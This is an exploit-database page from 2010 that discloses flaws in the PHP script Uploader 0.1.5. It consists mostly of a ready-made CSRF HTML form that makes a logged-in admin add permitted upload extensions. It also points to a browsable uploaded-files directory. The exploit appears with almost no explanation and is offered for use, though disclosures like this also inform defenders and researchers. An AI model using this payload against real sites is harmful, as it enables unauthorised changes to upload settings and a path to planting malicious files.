Home / os / win7

Uploader v0.1.5 Multiple Vulnerabilities

Posted on 11 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Uploader v0.1.5 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================
Uploader v0.1.5 Multiple Vulnerabilities
========================================

========================================================================================                 
| # Title    : Uploader 0.1.5 Mullti Vulnerability           
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com                                                                                                                                                                                                              
| # Script   : Powered by Uploader 0.1.5   
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Mullti
| # Download :                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- http://127.0.0.1/upload/
  
  http://127.0.0.1/upload/files/ ( File Name )
   
 2- Add Extensions CSRF Exploit :
  
 &lt;FORM METHOD=POST ACTION=&quot;http://127.0.0.1/upload/admin/admin_extensions_add.php&quot; ENCTYPE=&quot;multipart/form-data&quot;&gt;
 &lt;table width=&quot;99%&quot; cellpadding=&quot;4&quot; cellspacing=&quot;1&quot; border=&quot;0&quot; align=&quot;center&quot;&gt;
 
 &lt;tr&gt;
        &lt;td align=&quot;right&quot; valign=&quot;middle&quot;&gt;&lt;span class=&quot;gen&quot;&gt;&lt;? echo($lang['Disallow_extension']); ?&gt;&lt;/span&gt;&lt;/td&gt;
        &lt;td align=&quot;left&quot; valign=&quot;middle&quot;&gt;&lt;input type=&quot;text&quot; size=&quot;20&quot; maxlength=&quot;100&quot; name=&quot;extension&quot; value=&quot;&quot; /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br /&gt;
&lt;center&gt;
&lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;&lt;? echo($lang['Submit']); ?&gt;&quot; class=&quot;mainoption&quot; /&gt;&amp;nbsp;&amp;nbsp;&lt;input type=&quot;reset&quot; value=&quot;&lt;? echo($lang['Reset']); ?&gt;&quot; class=&quot;liteoption&quot; /&gt;
&lt;/center&gt;
&lt;/FORM&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :